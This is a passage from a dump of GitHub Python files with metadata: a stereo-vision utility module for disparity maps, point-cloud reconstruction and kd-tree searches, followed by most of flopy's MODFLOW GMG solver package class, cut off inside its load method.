plt.savefig(name)","repo_name":"sergioortiz26/Cancer_overlapping_filter_WSI_images","sub_path":"plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10602103101","text":"import cv2\nimport pcds\nimport time\nimport math\nimport stereoPairs\nimport numpy as np\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom kd_tree import kd_tree\nfrom KittiReconstruction import loadCalib\nfrom scipy.ndimage import convolve\nfrom sklearn.cluster import DBSCAN\nfrom matplotlib.patches import Rectangle\n\n\n# Function that displays an image with a rectangle on top of it\ndef disp_image_and_rectangle(img, rect_start, template_rows, template_cols):\n \"\"\"\n Display the image and the rectangle on top of it\n :param img: The image to display\n :param rect_start: The top left corner of the rectangle\n :param template_rows: The number of rows of the rectangle\n :param template_cols: The number of columns of the rectangle\n :return: Display the image and the rectangle on top of it\n \"\"\"\n # Display the original image\n plt.imshow(img, cmap='gray')\n\n # Get the current reference\n ax = plt.gca()\n\n # Create a Rectangle patch\n rect = Rectangle(rect_start, template_cols, template_rows, linewidth=1, edgecolor='r', facecolor='none')\n\n # Add the patch to the Axes\n ax.add_patch(rect)\n\n plt.show()\n\n\n# Function that visualizes the stereo frames\ndef visualize_stereo_frames(left_frame: np.ndarray, right_frame: np.ndarray):\n \"\"\"\n Visualize the stereo frames\n :param left_frame: The left frame\n :param right_frame: The right frame\n :return: Visualize the stereo frames\n \"\"\"\n\n # Concatenate the left and right frames horizontally\n concatenated_frames = np.hstack((left_frame, right_frame))\n\n # Convert to RGB if the input is in BGR format\n if left_frame.ndim == 3 and left_frame.shape[2] == 3:\n concatenated_frames = cv2.cvtColor(concatenated_frames, cv2.COLOR_BGR2RGB)\n\n # Display the concatenated frames using Matplotlib\n plt.figure(figsize=(12, 5))\n plt.imshow(concatenated_frames, cmap='gray' if left_frame.ndim == 2 else None)\n 
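# Added note: Matplotlib ignores cmap for 3-channel (RGB) input, so 'gray' only takes effect for 2-D frames.\n    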
plt.title('Stereo Frames')\n plt.axis('off')\n plt.show()\n\n\n# Function that visualizes a disparity map\ndef visualize_disparity_map(disparity_map: np.ndarray, cmap: str = 'jet', title: str = 'Disparity Map'):\n \"\"\"\n Visualize the disparity map\n :param title:\n :param disparity_map: The disparity map\n :param cmap: The color map to use\n :return: Visualize the disparity map\n \"\"\"\n # Normalize the disparity map for visualization\n # normalized_disparity = (disparity_map - disparity_map.min()) / (disparity_map.max() - disparity_map.min())\n normalized_disparity = disparity_map\n\n # Display the disparity map using Matplotlib\n plt.figure(figsize=(12, 5))\n plt.imshow(normalized_disparity, cmap=cmap)\n plt.title(title)\n plt.axis('off')\n plt.colorbar()\n plt.show()\n\n\n# Function that visualizes the point cloud\ndef visualize_point_cloud(vertices: np.ndarray, colors: np.ndarray):\n \"\"\"\n Visualize the point cloud\n :param vertices: The vertices of the point cloud\n :param colors: The colors of the point cloud\n :return: Visualize the point cloud\n \"\"\"\n # Create a point cloud object\n point_cloud = o3d.geometry.PointCloud()\n\n # Set the vertices and the colors\n point_cloud.points = o3d.utility.Vector3dVector(vertices)\n point_cloud.colors = o3d.utility.Vector3dVector(colors)\n\n # Visualize the point cloud\n o3d.visualization.draw_geometries([point_cloud])\n\n\n# Function that calculates a disparity map from a stereo pair using block matching algorithm\ndef stereo2disparity(left_frame: np.ndarray, right_frame: np.ndarray, block_size: int, previous_blocks_num: int):\n \"\"\"\n Stereo to disparity\n :param left_frame: The left frame\n :param right_frame: The right frame\n :param block_size: The block size\n :param previous_blocks_num: The number of previous blocks\n :return: The disparity map\n \"\"\"\n # Get the shape of the left frame\n rows, cols = left_frame.shape\n\n # Initialize the disparity map\n disparity_map = np.zeros_like(left_frame, dtype=np.float32)\n\n # Iterate over the left frame\n for row in tqdm(range(rows)):\n for col in range(cols):\n # Get the template\n template = left_frame[row: row + block_size, col: col + block_size]\n\n # Set the start of the columns of the search space as a parameter\n column_start = max(0, col - previous_blocks_num * block_size)\n # Set the end of the columns of the search space as a parameter\n column_end = col + block_size\n\n # Get the search space\n search_space = right_frame[row: row + block_size, column_start: column_end]\n\n # Do the template matching\n res = cv2.matchTemplate(search_space, template, cv2.TM_SQDIFF)\n\n # find the location of the min value\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n # Get the disparity\n disparity = col - (column_start + min_loc[0])\n\n # Update the disparity map\n disparity_map[row, col] = disparity\n\n return disparity_map\n\n\n# Function that calculate a point cloud from a disparity map using the pinhole camera model\ndef disparity2pointcloud(rows: int,\n columns: int,\n disparity: np.ndarray,\n baseline: float,\n left_frame_color: np.ndarray,\n field_of_view: float = 1.2,\n scale: int = 40):\n \"\"\"\n Disparity to point cloud\n :return: The vertices and the colors of the point cloud\n \"\"\"\n # Get the center of the image\n u0 = columns / 2\n v0 = rows / 2\n\n # Calculate the focal length\n focal_length = 1.0 / (2.0 * np.tan(field_of_view / 2.0))\n\n # Initialize the vertices and the color lists for the point cloud\n vertices = []\n colors = []\n\n # Iterate over 
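the pixel grid (illustrative note follows).\n    # (Editor's note: with the default field_of_view=1.2 rad, focal_length = 1/(2*tan(0.6)) ~ 0.731\n    #  in normalized units, and each pixel's depth below is focal_length*baseline/normalized_disparity.)\n    # Iterate over 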
the disparity map and calculate the point cloud\n for i in range(columns):\n for j in range(rows):\n # Normalize the disparity in order to be in the range [0, 1]\n normalized_disparity = disparity[j, i] / columns\n\n # If the normalized disparity is 0, then skip this point\n if normalized_disparity == 0:\n continue\n\n # Get the color from the left frame to color the point cloud\n color = left_frame_color[j, i]\n\n # Calculate the depth\n depth = focal_length * baseline / normalized_disparity\n\n # Calculate the x, y, z coordinates\n # Calculate the x coordinate\n x = ((i - u0) / columns) * (depth / focal_length)\n\n # Calculate the y coordinate\n y = -((j - v0) / rows) * (depth / focal_length)\n\n # The z coordinate is the depth\n z = depth\n\n if z > 0:\n # Append the vertices and the colors\n vertices.append([scale * x, scale * y, -scale * z])\n colors.append(np.array(color) / 255.0)\n\n vertices = np.stack(vertices)\n colors = np.stack(colors)\n return vertices, colors\n\n\n# Function that de-noises the point cloud using DBSCAN\ndef denoiseWithClustering(vertices: np.ndarray, colors: np.ndarray, eps: float, samples: int = 10):\n \"\"\"\n Denoise the point cloud using DBSCAN\n :param vertices: The vertices of the point cloud\n :param colors: The colors of the point cloud\n :param eps: The epsilon parameter of DBSCAN (maximum distance between two samples)\n :param samples: The minimum number of samples in a neighborhood for a point to be considered as a core point\n :return: Return the de-noised point cloud\n \"\"\"\n # Create the DBSCAN object\n labels = DBSCAN(eps=eps, min_samples=samples).fit(vertices)\n\n # Get the labels\n labels = labels.labels_\n\n # Get the unique labels\n vertices = vertices[labels > -1]\n\n # Get the unique colors\n colors = colors[labels > -1]\n\n return vertices, colors\n\n\n# Function that transforms a rgb image to grayscale\ndef rgb2gray(rgb: np.ndarray):\n \"\"\"\n Convert an RGB image to grayscale.\n\n Args:\n rgb (np.ndarray): RGB image.\n\n Returns:\n np.ndarray: Grayscale image.\n \"\"\"\n return rgb.mean(axis=2)\n\n\n# Function that downscales an image\ndef downscale(image: np.ndarray):\n \"\"\"\n Downscale an image\n\n Args:\n image (np.ndarray): Image to downscale.\n\n Returns:\n np.ndarray: Downscaled image.\n \"\"\"\n\n # Check if the image is grayscale or RGB\n if len(image.shape) == 2:\n # Grayscale image\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Downscale the image\n image = convolve(image, kernel)\n image = image[::2, ::2]\n\n elif len(image.shape) == 3:\n # RGB image\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Downscale the image\n image = convolve(image, kernel[:, :, None])\n image = image[::2, ::2, :]\n\n else:\n raise ValueError(\"The image must be grayscale or RGB\")\n\n return image\n\n\n# Function that applies gaussian smoothing to an image\ndef gaussianSmoothing(image: np.ndarray):\n \"\"\"\n Gaussian smoothing\n :param image: The disparity map\n :return: The smoothed disparity map\n \"\"\"\n # Create the kernel\n kernel = np.array([[1, 2, 1],\n [2, 4, 2],\n [1, 2, 1]]) / 16\n\n # Convolve the disparity map with the kernel\n smoothed_disparity_map = convolve(image, kernel)\n\n return smoothed_disparity_map\n\n\n# Function that finds the nearest neighbor of a point with a kd-tree\ndef find_nearest_neighbor_with_kd_tree(points: np.ndarray, kdtree: kd_tree):\n \"\"\"\n Find the nearest neighbor of a point with a kd tree\n :param points: The 
coordinates of the points of the point cloud\n :param kdtree: The kd tree\n :return: The distance and the index of the nearest neighbor\n \"\"\"\n # Get the number of points\n N = points.shape[0]\n\n # Get a random index\n ind = np.random.randint(N)\n\n # Find the nearest neighbor with the kd tree\n start_time = time.time()\n best_distance, best_index = kdtree.find_nearest_neighbor(points, ind)\n print(\"Time to find the nearest neighbour with the kd tree\", time.time() - start_time, \"seconds\")\n\n # Return the distance and the index of the nearest neighbor\n return best_distance, best_index\n\n\n# Function that finds the k nearest neighbors of a point with a kd-tree\ndef find_k_nearest_neighbors_with_kd_tree(points: np.ndarray, kdtree: kd_tree, k: int = 8):\n \"\"\"\n Find the k nearest neighbors for all the points in the dataset\n :param points: The coordinates of the points of the point cloud\n :param kdtree: The kd tree\n :param k: The number of neighbors\n :return: Return the indices and the distances of the k nearest neighbors\n \"\"\"\n # Get the number of points\n N = points.shape[0]\n\n # Set a numpy array to store the indices of the k nearest neighbors\n indices = np.zeros((N, k)).astype('int32')\n\n # Set a numpy array to store the distances of the k nearest neighbors\n distances = np.zeros((N, k))\n\n # Find the k nearest neighbors for all the points with the kd tree\n start_time = time.time()\n for i in tqdm(range(N)):\n # Find the k nearest neighbors with the kd tree\n k_distances, k_indices = kdtree.find_k_nearest_neighbors(points, i, k)\n\n # Store the indices\n indices[i] = k_indices\n # Store the distances\n distances[i] = k_distances\n\n # Print the time\n print(\"Time to find the k nearest neighbours for all the points with the kd tree\", time.time() - start_time,\n \"seconds\")\n\n # Return the indices and the distances\n return indices, distances\n\n\n# Function that finds which dataset the user has chosen depending on the artificial point cloud choice\ndef getDataForUsersPointCloudChoice(artificial_pointcloud_choice: str):\n \"\"\"\n Find which dataset the user has chosen depending on the artificial point cloud choice\n :param artificial_pointcloud_choice: The choice of the user\n :return: The pointcloud, the distance threshold, the epsilon and the minimum number of samples for the DBSCAN\n and a variable tha says if the pointcloud should be re-centered or not\n \"\"\"\n # Check if the user has chosen the first dataset\n if artificial_pointcloud_choice == \"1\":\n # The user has chosen the playground dataset\n distance_threshold = 0.15\n epsilon = 2\n min_samples = 100\n recenter = True\n return pcds.the_play_ground, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the second dataset\n elif artificial_pointcloud_choice == \"2\":\n # The user has chosen the researcher desk\n distance_threshold = 0.01\n epsilon = 0.01\n min_samples = 5\n recenter = False\n return pcds.the_researcher_desk, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the third dataset\n elif artificial_pointcloud_choice == \"3\":\n # The use has chosen the adas lidar dataset\n distance_threshold = 0.7\n epsilon = 2\n min_samples = 20\n recenter = True\n return pcds.the_adas_lidar, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the fourth dataset\n elif artificial_pointcloud_choice == \"4\":\n # The user has chosen the kitchen dataset (with walls)\n distance_threshold = 0.05\n epsilon = 
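# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original utility.py: the k-NN loop
# above queries the custom kd_tree once per point. SciPy's cKDTree computes
# the same table in a single vectorized call; each point's nearest neighbour
# is itself at distance 0, so k+1 neighbours are requested and column 0 is
# dropped.
#
#   import numpy as np
#   from scipy.spatial import cKDTree
#   points = np.random.rand(1000, 3)
#   distances, indices = cKDTree(points).query(points, k=8 + 1)
#   distances, indices = distances[:, 1:], indices[:, 1:]
# ---------------------------------------------------------------------------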
0.05\n min_samples = 5\n recenter = False\n return pcds.tls_kitchen, distance_threshold, epsilon, min_samples, recenter\n\n # Check if the user has chosen the fifth dataset\n elif artificial_pointcloud_choice == \"5\":\n # The user has chosen the kitchen dataset (without walls)\n distance_threshold = 0.01\n epsilon = 0.04\n min_samples = 20\n recenter = True\n return pcds.tls_kitchen_sample, distance_threshold, epsilon, min_samples, recenter\n\n # Else the choice is not valid\n else:\n return False, False, False, False, False\n\n\ndef getDataForUsersStereoImagesChoice(stereo_images_choice: str):\n \"\"\"\n Find which dataset the user has chosen depending on the stereo images choice\n :param stereo_images_choice: The choice of the user\n :return:\n \"\"\"\n data_path = \"data/\"\n # Check if the user has chosen the first dataset\n if stereo_images_choice == \"1\":\n # The user has chosen the first dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_78, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_78, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_78)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.15\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.2\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_78)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"2\":\n # The user has chosen the second dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_89, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_89, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_89)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.2\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.5\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_89)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, 
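# ---------------------------------------------------------------------------
# Illustrative sketch, not from the original file: the if/elif ladder in
# getDataForUsersPointCloudChoice above maps a menu choice to tuning
# parameters. A table-driven equivalent (hypothetical names; the values
# mirror the branches above, as (dataset, distance_threshold, eps,
# min_samples, recenter)):
#
#   POINTCLOUD_PRESETS = {
#       "1": (pcds.the_play_ground,     0.15, 2.00, 100, True),
#       "2": (pcds.the_researcher_desk, 0.01, 0.01,   5, False),
#       "3": (pcds.the_adas_lidar,      0.70, 2.00,  20, True),
#       "4": (pcds.tls_kitchen,         0.05, 0.05,   5, False),
#       "5": (pcds.tls_kitchen_sample,  0.01, 0.04,  20, True),
#   }
#   def lookup_preset(choice):
#       return POINTCLOUD_PRESETS.get(choice)  # None for an invalid choice
# ---------------------------------------------------------------------------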
min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"3\":\n # The user has chosen the third dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_102, cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.kitty_102, cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.kitty_102)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 8\n # Set the parameters for the reconstruction\n baseline = np.array([0.54, 0, 0])\n # Set the parameters for the fov (we don't have the fov)\n fov = 0.0\n # Set the parameters for RANSAC\n d_threshold = 0.2\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 0.1\n min_samples = 10\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 0.4\n clustering_min_samples = 100\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = True\n # Get the calibration matrices\n cam1, cam2 = loadCalib(data_path + stereoPairs.calibFolder + stereoPairs.calib_102)\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n elif stereo_images_choice == \"4\":\n # The user has chosen the first dataset of the kitty dataset\n # Load the images in grayscale\n left_image = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.storage_left,\n cv2.IMREAD_GRAYSCALE)\n right_image = cv2.imread(data_path + stereoPairs.rightImageFolder + stereoPairs.storage_right,\n cv2.IMREAD_GRAYSCALE)\n # Load only the left image in color\n left_image_color = cv2.imread(data_path + stereoPairs.leftImageFolder + stereoPairs.storage_left)\n # Set the parameters for the disparity map\n window_size = 8\n previous_windows_num = 5\n # Set the parameters for the reconstruction\n baseline = 0.2\n fov = 1.2\n # Set the parameters for RANSAC\n d_threshold = 0.1\n # Set the parameters for de-noising (with clustering DBSCAN)\n eps = 10\n min_samples = 50\n # Set the parameters for the clustering DBSCAN\n clustering_eps = 3.5\n clustering_min_samples = 30\n # Set a boolean to say if the choice is from the kitti dataset\n usingKitti = False\n # Get the calibration matrices (we don't have the calibration matrices)\n cam1, cam2 = None, None\n return left_image, right_image, left_image_color, window_size, previous_windows_num, baseline, fov, \\\n d_threshold, eps, min_samples, clustering_eps, clustering_min_samples, usingKitti, cam1, cam2\n else:\n # The choice is not valid\n return False, False, False, False, False, False, False, False, False, False, False, False, False, False, False\n\n\ndef points_distance(p1, p2) -> float:\n \"\"\"\n Calculate the distance between two getPoints\n :param p1: The first point\n :param p2: The second point\n :return: The distance between the two getPoints\n \"\"\"\n return math.sqrt((p2.x - p1.x)**2 + (p2.y - p1.y)**2 + (p2.z - p1.z)**2)\n\n\n# Calculate the distance between a point and an edge\ndef point_to_edge_distance(point, edge) -> float:\n \"\"\"\n Calculate the distance between a point and an edge\n :param point: The point\n :param edge: The edge\n :return: The distance between the point and the edge\n \"\"\"\n v1 = [edge.p1.x - point.x, edge.p1.y - 
point.y, edge.p1.z - point.z]\n v2 = [edge.p1.x - edge.p2.x, edge.p1.y - edge.p2.y, edge.p1.z - edge.p2.z]\n return np.linalg.norm(np.cross(v1, v2)) / np.linalg.norm(v2)\n","repo_name":"Kalaitzo/Stereo-Vision","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":21763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27127049982","text":"\"\"\"\nmfgmg module. Contains the ModflowGmg class. Note that the user can access\nthe ModflowGmg class as `flopy.modflow.ModflowGmg`.\n\nAdditional information for this MODFLOW package can be found at the `Online\nMODFLOW Guide\n`_.\n\n\"\"\"\nfrom ..pakbase import Package\n\n\nclass ModflowGmg(Package):\n \"\"\"\n MODFLOW GMG Package Class.\n\n Parameters\n ----------\n model : model object\n The model object (of type :class:`flopy.modflow.mf.Modflow`) to which\n this package will be added.\n mxiter : int\n maximum number of outer iterations. (default is 50)\n iiter : int\n maximum number of inner iterations. (default is 30)\n iadamp : int\n is a flag that controls adaptive damping. The possible values\n of iadamp are.\n\n If iadamp = 0, then the value assigned to DAMP is used as a constant\n damping parameter.\n\n If iadamp = 1, the value of damp is used for the first nonlinear\n iteration. The damping parameter is adaptively varied on the basis\n of the head change, using Cooley's method as described in Mehl\n and Hill (2001), for subsequent iterations.\n\n If iadamp = 2, the relative reduced residual damping method documented\n in Mehl and Hill (2001) and modified by Banta (2006) is used.\n\n When iadamp is specified as 2 and the value specified for DAMP is less\n than 0.5, the closure criterion for the inner iterations (drclose) is\n assigned simply as rclose. When damp is between 0.5 and 1.0, inclusive,\n or when iadamp is specified as 0 or 1, drclose is calculated according\n to equation 20 on p. 9 of Wilson and Naff (2004).\n hclose : float\n is the head change criterion for convergence. (default is 1e-5).\n rclose : float\n is the residual criterion for convergence. (default is 1e-5)\n relax : float\n is a relaxation parameter for the ILU preconditioned conjugate\n gradient method. The relax parameter can be used to improve the\n spectral condition number of the ILU preconditioned system. The value\n of relax should be approximately one. However, the relaxation parameter\n can cause the factorization to break down. If this happens, then the\n gmg solver will report an assembly error and a value smaller than one\n for relax should be tried. This item is read only if isc = 4.\n ioutgmg : int\n is a flag that controls the output of the gmg solver. The\n possible values of ioutgmg are.\n\n If ioutgmg = 0, then only the solver inputs are printed.\n\n If ioutgmg = 1, then for each linear solve, the number of pcg\n iterations, the value of the damping parameter, the l2norm of\n the residual, and the maxnorm of the head change and its location\n (column, row, layer) are printed. 
At the end of a time/stress period,\n the total number of gmg calls, pcg iterations, and a running total\n of pcg iterations for all time/stress periods are printed.\n\n If ioutgmg = 2, then the convergence history of the pcg iteration is\n printed, showing the l2norm of the residual and the convergence factor\n for each iteration.\n\n ioutgmg = 3 is the same as ioutgmg = 1 except output is sent to the\n terminal instead of the modflow list output file.\n\n ioutgmg = 4 is the same as ioutgmg = 2 except output is sent to the\n terminal instead of the modflow list output file.\n\n (default is 0)\n iunitmhc : int\n is a flag and a unit number, which controls output of maximum\n head change values. If iunitmhc = 0, maximum head change values\n are not written to an output file. If iunitmhc > 0, maximum head\n change values are written to unit iunitmhc. Unit iunitmhc should\n be listed in the Name file with 'DATA' as the file type. If\n iunitmhc < 0 or is not present, iunitmhc defaults to 0.\n (default is 0)\n ism : int\n is a flag that controls the type of smoother used in the multigrid\n preconditioner. If ism = 0, then ilu(0) smoothing is implemented in\n the multigrid preconditioner; this smoothing requires an additional\n ector on each multigrid level to store the pivots in the ilu\n factorization. If ism = 1, then symmetric gaussseidel (sgs) smoothing\n is implemented in the multigrid preconditioner. No additional storage\n is required if ism = 1; users may want to use this option if available\n memory is exceeded or nearly exceeded when using ism = 0. Using sgs\n smoothing is not as robust as ilu smoothing; additional iterations are\n likely to be required in reducing the residuals. In extreme cases, the\n solver may fail to converge as the residuals cannot be reduced\n sufficiently. (default is 0)\n isc : int\n is a flag that controls semicoarsening in the multigrid\n preconditioner. If isc = 0, then the rows, columns and layers are\n all coarsened. If isc = 1, then the rows and columns are coarsened,\n but the layers are not. If isc = 2, then the columns and layers are\n coarsened, but the rows are not. If isc = 3, then the rows and layers\n are coarsened, but the columns are not. If isc = 4, then there is no\n coarsening. Typically, the value of isc should be 0 or 1. In the case\n that there are large vertical variations in the hydraulic\n conductivities, then a value of 1 should be used. If no coarsening is\n implemented (isc = 4), then the gmg solver is comparable to the pcg2\n ilu(0) solver described in Hill (1990) and uses the least amount of\n memory. (default is 0)\n damp : float\n is the value of the damping parameter. For linear problems, a value\n of 1.0 should be used. For nonlinear problems, a value less than 1.0\n but greater than 0.0 may be necessary to achieve convergence. A typical\n value for nonlinear problems is 0.5. Damping also helps control the\n convergence criterion of the linear solve to alleviate excessive pcg\n iterations. (default 1.)\n dup : float\n is the maximum damping value that should be applied at any iteration\n when the solver is not oscillating; it is dimensionless. An appropriate\n value for dup will be problem-dependent. For moderately nonlinear\n problems, reasonable values for dup would be in the range 0.5 to 1.0.\n For a highly nonlinear problem, a reasonable value for dup could be as\n small as 0.1. When the solver is oscillating, a damping value as large\n as 2.0 x DUP may be applied. 
(default is 0.75)\n dlow : float\n is the minimum damping value to be generated by the adaptive-damping\n procedure; it is dimensionless. An appropriate value for dlow will be\n problem-dependent and will be smaller than the value specified for dup.\n For a highly nonlinear problem, an appropriate value for dlow might be\n as small as 0.001. Note that the value specified for the variable,\n chglimit, could result in application of a damping value smaller than\n dlow. (default is 0.01)\n chglimit : float\n is the maximum allowed head change at any cell between outer\n iterations; it has units of length. The effect of chglimit is to\n determine a damping value that, when applied to all elements of the\n head-change vector, will produce an absolute maximum head change equal\n to chglimit. (default is 1.0)\n extension : list string\n Filename extension (default is 'gmg')\n unitnumber : int\n File unit number (default is None).\n filenames : str or list of str\n Filenames to use for the package and the output files. If\n filenames=None the package name will be created using the model name\n and package extension and the gmg output name will be created using\n the model name and .cbc extension (for example, modflowtest.gmg.out),\n if iunitmhc is a number greater than zero. If a single string is passed\n the package will be set to the string and gmg output names will be\n created using the model name and .gmg.out extension, if iunitmhc is a\n number greater than zero. To define the names for all package files\n (input and output) the length of the list of strings should be 2.\n Default is None.\n\n Returns\n -------\n None\n\n Attributes\n ----------\n\n Methods\n -------\n\n See Also\n --------\n\n Notes\n -----\n\n Examples\n --------\n\n >>> import flopy\n >>> m = flopy.modflow.Modflow()\n >>> gmg = flopy.modflow.ModflowGmg(m)\n\n\n \"\"\"\n\n def __init__(\n self,\n model,\n mxiter=50,\n iiter=30,\n iadamp=0,\n hclose=1e-5,\n rclose=1e-5,\n relax=1.0,\n ioutgmg=0,\n iunitmhc=None,\n ism=0,\n isc=0,\n damp=1.0,\n dup=0.75,\n dlow=0.01,\n chglimit=1.0,\n extension=\"gmg\",\n unitnumber=None,\n filenames=None,\n ):\n # set default unit number of one is not specified\n if unitnumber is None:\n unitnumber = ModflowGmg._defaultunit()\n\n # set filenames\n filenames = self._prepare_filenames(filenames, 2)\n\n # update external file information with gmg output, if necessary\n if iunitmhc is not None:\n model.add_output_file(\n iunitmhc,\n fname=filenames[1],\n extension=\"gmg.out\",\n binflag=False,\n package=self._ftype(),\n )\n else:\n iunitmhc = 0\n\n # call base package constructor\n super().__init__(\n model,\n extension=extension,\n name=self._ftype(),\n unit_number=unitnumber,\n filenames=filenames[0],\n )\n\n # check if a valid model version has been specified\n if model.version == \"mfusg\":\n err = \"Error: cannot use {} package with model version {}\".format(\n self.name, model.version\n )\n raise Exception(err)\n\n self._generate_heading()\n self.url = \"gmg.html\"\n\n self.mxiter = mxiter\n self.iiter = iiter\n self.iadamp = iadamp\n self.hclose = hclose\n self.rclose = rclose\n self.relax = relax\n self.ism = ism\n self.isc = isc\n self.dup = dup\n self.dlow = dlow\n self.chglimit = chglimit\n self.damp = damp\n self.ioutgmg = ioutgmg\n self.iunitmhc = iunitmhc\n self.parent.add_package(self)\n\n def write_file(self):\n \"\"\"\n Write the package file.\n\n Returns\n -------\n None\n\n \"\"\"\n f_gmg = open(self.fn_path, \"w\")\n f_gmg.write(f\"{self.heading}\\n\")\n # dataset 0\n 
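        # -------------------------------------------------------------------
        # Note (added for clarity; layout inferred from the write/load pair
        # in this file): the four records written below are
        #   RCLOSE IITER HCLOSE MXITER
        #   DAMP IADAMP IOUTGMG [IUNITMHC]
        #   ISM ISC [DUP DLOW CHGLIMIT   -- only when IADAMP == 2]
        #   RELAX
        # e.g. an adaptive-damping setup would be constructed as
        #   flopy.modflow.ModflowGmg(m, iadamp=2, damp=0.5, dup=0.75,
        #                            dlow=0.01, chglimit=1.0)
        # -------------------------------------------------------------------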
f_gmg.write(\n f\"{self.rclose} {self.iiter} {self.hclose} {self.mxiter}\\n\"\n )\n # dataset 1\n f_gmg.write(\n f\"{self.damp} {self.iadamp} {self.ioutgmg} {self.iunitmhc}\\n\"\n )\n # dataset 2\n f_gmg.write(f\"{self.ism} {self.isc} \")\n if self.iadamp == 2:\n f_gmg.write(f\"{self.dup} {self.dlow} {self.chglimit}\")\n f_gmg.write(\"\\n\")\n # dataset 3\n f_gmg.write(f\"{self.relax}\\n\")\n f_gmg.close()\n\n @classmethod\n def load(cls, f, model, ext_unit_dict=None):\n \"\"\"\n Load an existing package.\n\n Parameters\n ----------\n f : filename or file handle\n File to load.\n model : model object\n The model object (of type :class:`flopy.modflow.mf.Modflow`) to\n which this package will be added.\n ext_unit_dict : dictionary, optional\n If the arrays in the file are specified using EXTERNAL,\n or older style array control records, then `f` should be a file\n handle. In this case ext_unit_dict is required, which can be\n constructed using the function\n :class:`flopy.utils.mfreadnam.parsenamefile`.\n\n Returns\n -------\n gmg : ModflowGmg object\n\n Examples\n --------\n\n >>> import flopy\n >>> m = flopy.modflow.Modflow()\n >>> gmg = flopy.modflow.ModflowGmg.load('test.gmg', m)\n\n \"\"\"\n\n if model.verbose:\n print(\"loading gmg package file...\")\n\n openfile = not hasattr(f, \"read\")\n if openfile:\n filename = f\n f = open(filename, \"r\")\n\n # dataset 0 -- header\n while True:\n line = f.readline()\n if line[0] != \"#\":\n break\n # dataset 0\n t = line.strip().split()\n rclose = float(t[0])\n iiter = int(t[1])\n hclose = float(t[2])\n mxiter = int(t[3])\n # dataset 1\n line = f.readline()\n t = line.strip().split()\n damp = float(t[0])\n iadamp = int(t[1])\n ioutgmg = int(t[2])\n try:\n iunitmhc = int(t[3])\n except:\n iunitmhc = 0\n # dataset 2\n line = f.readline()\n t = line.strip().split()\n ism = int(t[0])\n isc = int(t[1])\n dup, dlow, chglimit = 0.75, 0.01, 1.0\n if iadamp == 2:\n dup = float(t[2])\n dlow = float(t[3])\n chglimit = float(t[4])\n # dataset 3\n line = f.readline()\n t = line.strip().split()\n relax = 1.0\n if ism == 4:\n relax = float(t[0])\n\n if openfile:\n 